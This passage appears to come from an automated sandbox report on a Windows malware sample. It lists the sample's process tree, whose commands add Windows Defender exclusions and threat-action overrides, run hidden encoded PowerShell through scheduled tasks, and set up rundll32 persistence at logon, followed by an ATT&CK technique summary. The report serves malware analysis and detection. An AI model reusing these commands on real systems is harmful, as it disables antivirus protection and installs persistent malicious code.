\"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵PID:6104
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:5064
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:1112
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:5440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:5956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:3424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:1460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:5752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:5816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:5664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:5976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:5184
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:3964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:5176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:2224
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:5536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:1976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3252
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4200
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:5436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:5568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:1708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:5804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:2984
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"2⤵PID:1604
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:323⤵PID:3740
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:324⤵PID:184
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:643⤵PID:2172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:323⤵PID:5276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:643⤵PID:976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:323⤵PID:5180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:643⤵PID:5884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:323⤵PID:3976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:643⤵PID:2956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:323⤵PID:3760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:643⤵PID:2076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:323⤵PID:6004
-
-
    C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:64
    PID:5684

    C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    PID:6008

    C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    PID:5996

    C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    PID:5600

    C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    PID:6024

    C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:32
    PID:5448

    C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:64
    PID:5832

    C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:32
    PID:1976

    C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:64
    PID:5692

  C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "ggLAFgWrk" /SC once /ST 09:08:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  - Creates scheduled task(s)
  PID:4348

  C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "ggLAFgWrk"
  PID:2228

  C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "ggLAFgWrk"
  PID:368

  C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "mRaseIvrfxDtBOYKW" /SC once /ST 07:19:05 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\FdDlcag.exe\" Ty /JCsite_idmEP 385118 /S" /V1 /F
  - Creates scheduled task(s)
  PID:3876

  C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "mRaseIvrfxDtBOYKW"
  PID:6072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
PID:5024

  C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  PID:5496

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
PID:2472

C:\Windows\windefender.exe
C:\Windows\windefender.exe
PID:5356

C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\FdDlcag.exe
C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\FdDlcag.exe Ty /JCsite_idmEP 385118 /S
PID:5292

  C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bdnnguwcOLBYKAjbbA"
  PID:3744

  C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
  PID:1108

    C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    PID:2924

  C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
  PID:4816

    C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    PID:5976

  C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\oBlsMT.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F
  - Creates scheduled task(s)
  PID:5664
Network
MITRE ATT&CK Enterprise v15
Persistence
- Create or Modify System Process (2)
  - Windows Service (2)
- Scheduled Task/Job (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Create or Modify System Process (2)
  - Windows Service (2)
- Scheduled Task/Job (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (4)
  - Disable or Modify System Firewall (1)
  - Disable or Modify Tools (3)
- Modify Registry (6)
- Subvert Trust Controls (1)
  - Install Root Certificate (1)
- Virtualization/Sandbox Evasion (1)
Downloads